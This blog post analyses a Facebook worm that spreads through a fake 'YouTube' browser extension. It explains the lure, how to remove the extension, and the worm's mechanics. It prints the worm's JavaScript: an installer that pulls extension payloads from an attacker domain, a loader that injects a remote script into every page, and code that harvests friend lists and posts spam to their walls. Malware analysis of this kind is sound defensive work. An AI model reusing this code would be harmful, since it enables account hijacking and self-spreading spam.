IT question and answers

facebook virus

image

 

First of all sorry for the offensive picture above but it must be familiar for many of you, some of us have fallen victim to this scam and have ended up being cursed by friends about the postings which we never did.

This scam titled “[VIDEO] Yeahh!! It happens on Live Television!and “Hey You Check The Sad post, I Dare you can watch this “ spreads itself by sharing its link on the victim’s friends’ walls and is right now one of the fastest spreading scams on Facebook.

I decided to look in to how this thing really works and after digging into the virus code, I present to you a few facts about it:

  • This virus makes use of a method known as “Cross Site Scripting”, which means that once installed, the virus injects its own code into any web page the user is viewing.
  • This virus/spam uses social engineering brilliantly – it makes people believe that what they are about to install is actually from a source that they can trust (in this case “youtube”), and so even if the browser asks the user whether they are sure they want to install the extension, they accept it in hopes that this would allow them to see the video.
  • This virus may have been created by a Spanish guy because most of the function names are in Spanish. For e.g.: “fb_comparte()” (comparte is a Spanish word which means ‘to share’)
  • This virus works only on chrome and firefox, it installs itself as a browser extension on these browsers, so if you are using internet explorer don’t worry if you have ever clicked on that link, you are safe .
  • The browser extension just adds a javascript on whatever page the user visits..This javascript does rest of the work.
  • It picks up 30 friends from the victim’s friend list at random and posts the link on their walls.
  • Once it’s done with the posting, it sets up a cookie named “fb_videoce_” on the victim’s browser which tells the virus that it has already done the posting so that it doesn’t go on posting again.
  • This cookie stays in your browser’s cache till the next 300 days or till you clear your browser’s cache and once it is removed, the virus again posts the link to 30 random friends and recreates the cookie again. So if you think that clearing the browser’s cache is going to remove the virus, don’t do it, it’s just going to reactivate it.
  • In case you are wondering, what the video actually is and whether it really exists or not : the video does exist and is of an Italian model “Marika Fruscio” who’s wearing too little to keep her “assets” contained.

    For the “curious” kind, here’s the link for the video, and don’t worry this link wouldn’t post itself on your friends’ walls:

    http://www.youtube.com/embed/JfcTBeyDHls?wmode=transparent

So How Do I get Rid of this virus?

If your browser has been infected by this virus, all you need to do is simply check for an extension/add-on named “YouTube” and uninstall it from your browser.

To un-install it from chrome , click the wrench icon on the top right corner , go to tools -> extensions and remove the extension named “YouTube” from the opened window.

 

 

To uninstall it from Firefox, click on the Firefox icon on the top left corner of the browser –>

click Add-ons -> on the new opened window,

click Extensions -> remove the extension named “YouTube”



 
 

How does it fool the people into installing it?

Once a user clicks on the shared link, a page pops up with a box that looks somewhat likes this:

 

Now, to the unsuspecting user, this looks like a YouTube video box asking for a missing plugin to be installed.

Clicking the “Install Plugin” link runs the following javascript :

var is_chrome = navigator.userAgent.toLowerCase().indexOf(‘chrome’) > -1;

var is_firefox = navigator.userAgent.toLowerCase().indexOf(‘firefox’) > -1;

function instalar(){

if (is_chrome){

window.open("http://mieneeueueu.co.cc/yt/youtube.crx");

} else if(is_firefox){

var params = {

"Youtube Extension": {

URL: "http://mieneeueueu.co.cc/yt/youtube.xpi",

toString: function () { return this.URL; }

}

};

InstallTrigger.install(params);

} else{

window.open("http://mieneeueueu.co.cc/yt/video.php");

}

}

This piece of code checks the userAgent to find out which browser the user is using. if the user is using Firefox, this code will try to install a Firefox extension named youtube.xpi and if the browser being used is chrome , then the code will try to install a chrome extension youtube.crx, in both the cases the user will be asked for confirmation by the browser whether they want to install this , but since the user thinks this is from a trusted source, he is going to accept the installation.

However, if the user is using some other browser, this is going to open up a page video.php which actually contains the promised YouTube embedded video.

 

The Technical Part Start Here

If you are not the technical kind then you can skip directly to the conclusion because in the next section I’ll be explaining the working of this virus in a more technical fashion.

 

How does the virus make the posting?

Once the browser extension is installed, it adds a javascript element to every page you visit. To do this, it executes the following code:

function addScript() {

var s = document.createElement(‘script’);

s.setAttribute("type", "text/javascript");

s.setAttribute("src", "http://mieneeueueu.co.cc/yt/extra.js");

var a = document.getElementsByTagName(‘script’)[0];

if (a == null) return false;

a.appendChild(s);

return true

}

As can be seen in the above code, this adds a javascript “extra.js” to whichever page you visit. This script checks whether the current url matches the regex pattern/^http:\/\/(www\.)?facebook.com/i and if it does, it executes a function called named fb_comparte() which first makes an ajax call to get a list of the victim’s friends and then another ajax call to post the link on their walls.

This is the AJAX call to facebook’s “first_degree.php” page to retrieve a list of the victim’s friends:

gf = new XMLHttpRequest();

gf['open'](‘GET’, ‘/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=’ + uid + ‘&’ + Math['random'](), false);

gf['send']();

if (gf['readyState'] != 4) {} else {

data = eval(‘(‘ + gf['responseText']['substr'](9) + ‘)’);

if (data['error']) {

return false;

} else {

a = data;

}

}

var b = a['payload']['entries']['length'];

if (b > 30) {

b = 30

};

And here’s that piece of code that is used for the posting, this makes AJAX calls to “compose.php” in a loop :

for (var f = 0; f < b; f++) {

if (a['payload']['entries'][f]['uid'] != user_id) {

message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](‘ ‘))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](‘ ‘);

var g = new XMLHttpRequest();

d = ‘http://www.facebook.com/ajax/profile/composer.php?__a=1′;

title = ‘[VIDEO] Yeahh!! It happens on Live Television!’;

summary = ‘Lol Checkout this video its very embracing moment for her’;

imagen = ‘http://i.imgur.com/ZgjR4.jpg’;

e = ‘post_form_id=’ + post_form_id + ‘&fb_dtsg=’ + fb_dtsg + ‘&xhpc_composerid=u574553_1&xhpc_targetid=’ + a['payload']['entries'][f]['uid'] + ‘&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id= 2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=’ + randomValue(video_url) + ‘&attachment[params][urlInfo][canonical]=’ + randomValue(video_url) + ‘&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=’ + title + ‘&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=’ + summary + randomValue(p0) + ‘&attachment[params][url]=’ + randomValue(video_url) + ‘&attachment[params][images]&attachment[params][images][src]=’ + randomValue(domains) + ‘%26′ + Math['random']() + ‘&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=’ + imagen + ‘&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=’ + message + ‘&xhpc_message=’ + message + ‘&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data

[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest’;

g['open'](‘POST’, d, true);

g['setRequestHeader'](‘Content-type’, ‘application/x-www-form-urlencoded’);

g['setRequestHeader'](‘Content-length’, e['length']);

g['setRequestHeader'](‘Connection’, ‘keep-alive’);

g['onreadystatechange'] = function () {};

g['send'](e);

}

}

The conclusion:

After examining the complete code I have come to conclude that the virus does not possess any security threat to the victim i.e. it does not log credit card numbers, passwords e.t.c., right now it’s just a little nuisance creator but you never know when someone decides to create a mutation of this virus which logs sensitive information from the victim’s browser.

The main thing to understand here is that, this doesn’t stop only on Facebook, a little change to the script can have it sending emails from your Gmail and Hotmail accounts.
Well folks, now that you know how this works, I hope you know how to keep yourselves safe from it. Stay safe